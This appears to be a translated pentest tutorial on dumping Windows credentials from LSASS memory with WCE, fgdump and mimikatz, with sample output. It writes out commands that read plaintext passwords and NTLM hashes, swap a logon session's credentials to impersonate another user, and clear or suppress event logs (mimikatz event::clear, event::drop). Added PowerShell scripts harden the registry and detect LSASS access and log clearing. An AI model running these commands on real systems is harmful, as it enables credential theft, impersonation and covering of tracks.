Preface
The Windows authentication process is shown in the figure.
The pwdump covered in the previous section reads hashes from the SAM database.
If the credentials can instead be read from memory, the defenses in the way are much weaker.
1. WCE (Windows Credential Editor)
- Windows keeps a plaintext copy of the password in memory (the LSASS process), and it is weakly protected
- Requires administrator privileges
- The tool ships in Kali at /usr/share/wce/wce-universal # the universal build auto-detects 32-bit vs 64-bit
- Works on a target host with multiple users logged on
Procedure:
Copy wce to the Windows machine.
In cmd:
C:\>wce-universal.exe -lv #list logged-on users
0020B19D:user1:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
0000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
# Same result as C:\>PwDump.exe localhost
C:\>wce-universal.exe -d 0020B19D #delete the user1 account (logon session 0020B19D) from memory
C:\>wce-universal.exe -lv #the deletion succeeded
001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
0000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
C:\>wce-universal.exe -g passwd #compute the hashes for a given password
Password: passwd
Hashes: 91C7AE7122196B5EAAD3B435B51404EE:22315D6ED1A7D5F8A7C98C40E9FA2DEC
C:\>wce-universal.exe -w #read the plaintext passwords from memory
user1\ICST-WINATT:123456
user2\ICST-WINATT:123456
test\ICST-WINATT:123456
kevin\ICST-WINATT:123456
NETWORK SERVICE\MSHOME:
C:\>net user user1 111222 #change user1's password
C:\>wce-universal.exe -w
user1\ICST-WINATT:123456
user2\ICST-WINATT:123456
test\ICST-WINATT:123456
kevin\ICST-WINATT:123456
NETWORK SERVICE\MSHOME:
# Nothing changed in memory: the value currently held there is what gets read out, until the next logon
C:\>wce-universal.exe -lv
001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
0000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
C:\>wce-universal.exe -i 001E5D92 -s kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4 #modify the logon session by LUID (point this LUID at another user's username and hashes)
Changing NTLM credentials of logon session 001E5D92h to:
Username: kevin
domain: ICST-WINATT
LMHash: 44EFCE164AB921CAAAD3B435B51404EE
NTHash: 32ED87BDB5FDC5E9CBA88547376818D4
NTLM credentials successfully changed!
C:\>wce-universal.exe -lv #check again: the entry has been changed
001E5D92:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
Countermeasures:
In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
delete the entries
wdigest and tspkg
and leave no blank lines in the value.
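The registry edit above is easy to get wrong by hand (a leftover empty line in a REG_MULTI_SZ is exactly the "no blank lines" problem). The script below is an added example, not part of the original post or of WCE, that audits the Security Packages value, rewrites it without wdigest/tspkg, and also checks the UseLogonCredential switch, which goes beyond the post (it is the modern WDigest control introduced by KB2871997). Paths and value names are the documented Windows ones; run it from an elevated PowerShell.

```powershell
# Added example (not from the original post). Run elevated.
$LsaKey     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$WDigestKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
$Unwanted   = @('wdigest', 'tspkg')   # the two SSPs the post says to remove

function Get-SecurityPackages {
    # REG_MULTI_SZ comes back as a string array; drop empty strings so a
    # stray blank line is never written back.
    $v = (Get-ItemProperty -Path $LsaKey -Name 'Security Packages').'Security Packages'
    return @($v | Where-Object { $_ -ne '' })
}

function Test-SecurityPackages {
    $current  = Get-SecurityPackages
    $bad      = @($current | Where-Object { $Unwanted -contains $_.ToLower() })
    $findings = if ($bad.Count -gt 0) { "loaded: $($bad -join ', ')" } else { 'none' }
    [pscustomobject]@{ Current = ($current -join ' '); Findings = $findings }
}

function Remove-UnwantedSecurityPackages {
    param([switch]$Apply)   # without -Apply this is a dry run
    $current = Get-SecurityPackages
    $clean   = @($current | Where-Object { $Unwanted -notcontains $_.ToLower() })
    if ($clean.Count -eq $current.Count) { Write-Host 'Nothing to remove.'; return }
    Write-Host "New value would be: $($clean -join ' ')"
    if ($Apply) {
        # -Type MultiString writes a proper REG_MULTI_SZ with no empty entries.
        Set-ItemProperty -Path $LsaKey -Name 'Security Packages' -Value $clean -Type MultiString
        Write-Host 'Written; the change takes effect after a reboot.'
    }
}

function Test-WDigestLogonCredential {
    # Beyond the post: UseLogonCredential = 0 stops WDigest from keeping
    # plaintext credentials in LSASS on patched systems.
    $p = Get-ItemProperty -Path $WDigestKey -Name 'UseLogonCredential' -ErrorAction SilentlyContinue
    if ($null -eq $p) { return 'UseLogonCredential not set' }
    if ($p.UseLogonCredential -eq 0) { return 'UseLogonCredential=0 (plaintext caching disabled)' }
    return "UseLogonCredential=$($p.UseLogonCredential) (plaintext caching ENABLED)"
}

Test-SecurityPackages | Format-List
Test-WDigestLogonCredential
Remove-UnwantedSecurityPackages            # dry run
# Remove-UnwantedSecurityPackages -Apply   # actually rewrite the value
```

Removing an SSP disables whatever depended on it (HTTP Digest authentication for wdigest, Terminal Services single sign-on for tspkg), so test the change on one machine before rolling it out, and reboot for it to take effect.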
2. fgdump
In Kali it is found at /usr/share/windows-binaries/fgdump/
Put it on a WinXP machine; double-clicking it or running fgdump.exe from the command line generates three files, which contain the passwords.
3. mimikatz
Path in Kali: /usr/share/mimikatz
A god-tier tool.
Put it on the Windows machine.
Some of its functions:
C:\Win32>mimikatz.exe
#show the help with ::
mimikatz # ::
standard - Standard module [Basic commands (does not require module name)]
crypto - Crypto Module
sekurlsa - SekurLSA module [Some commands to enumerate credentials...]
kerberos - Kerberos package module []
privilege - Privilege module
process - Process module
service - Service module
lsadump - LsaDump module
ts - Terminal Server module
event - Event module
misc - Miscellaneous module
token - Token manipulation module
vault - Windows Vault/Credential module
minesweeper - MineSweeper module
net -
dpapi - DPAPI Module (by API or RAW access) [Data Protection application programming interface]
busylight - BusyLight Module
sysenv - System Environment Value module
sid - Security Identifiers module
iis - IIS XML Config module
rpc - RPC control of mimikatz
mimikatz # privilege::
Module : privilege
Full name : Privilege module
debug - Ask debug privilege * *
driver - Ask load driver privilege
security - Ask security privilege
tcb - Ask tcb privilege
backup - Ask backup privilege
restore - Ask restore privilege
sysenv - Ask system environment privilege
id - Ask a privilege by its id
name - Ask a privilege by its name
mimikatz # privilege::debug #elevate (acquire the debug privilege)
mimikatz # sekurlsa::
mimikatz # sekurlsa::logonPasswords #shows a lot of user information
mimikatz # sekurlsa::wdigest
mimikatz # process::list #list processes
mimikatz # lsadump::sam #get the user data from the SAM
mimikatz # lsadump::cache
mimikatz # ts::multirdp #XP allows only one logged-on user by default; this enables concurrent users
mimikatz # event::clear #clear the event log
mimikatz # event::drop #stop new log entries from being generated
mimikatz # misc::regedit #registry editor
mimikatz # token::whoami #the token module has a whoami function
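Two of the commands above leave traces a defender can look for: sekurlsa::logonPasswords must open a handle to LSASS, and event::clear produces a "log cleared" record (Security event 1102, System event 104) before the log goes quiet. The script below is an added example, not part of the original post or of mimikatz, that pulls both out of the event logs. It assumes Sysmon is installed (the LSASS check uses Sysmon event 10, ProcessAccess) and that the Security log still exists; run it elevated.

```powershell
# Added example (not from the original post). Run elevated.

function Get-LogClearedEvents {
    # 1102 = Security log cleared, 104 = System log cleared
    param([int]$Hours = 24)
    $since   = (Get-Date).AddHours(-$Hours)
    $filters = @(
        @{ LogName = 'Security'; Id = 1102; StartTime = $since },
        @{ LogName = 'System';   Id = 104;  StartTime = $since }
    )
    foreach ($f in $filters) {
        Get-WinEvent -FilterHashtable $f -ErrorAction SilentlyContinue | ForEach-Object {
            [pscustomobject]@{
                Time = $_.TimeCreated
                Log  = $f.LogName
                Id   = $_.Id
                User = $_.UserId                        # SID recorded on the event
                Text = ($_.Message -split "`n")[0]      # first line of the message
            }
        }
    }
}

function Get-LsassAccessEvents {
    # Sysmon event 10: a process opened a handle to another process.
    param([int]$Hours = 24)
    $since  = (Get-Date).AddHours(-$Hours)
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 10; StartTime = $since }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # Pull the EventData fields out of the event XML by name.
        $x = [xml]$_.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        if ($d['TargetImage'] -like '*\lsass.exe') {
            [pscustomobject]@{
                Time        = $_.TimeCreated
                SourceImage = $d['SourceImage']
                SourceUser  = $d['SourceUser']          # only on newer Sysmon builds
                Access      = $d['GrantedAccess']       # requested access mask
            }
        }
    }
}

Get-LogClearedEvents | Format-Table -AutoSize
Get-LsassAccessEvents | Sort-Object SourceImage -Unique | Format-Table -AutoSize
```

Expect some legitimate LSASS access from antivirus and system components; the useful signal is an unfamiliar SourceImage, or one running from a user-writable directory, and any 1102/104 event from an account that has no business clearing logs.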
Closing remarks
These tools are all quite handy.
mimikatz is the most complete of them.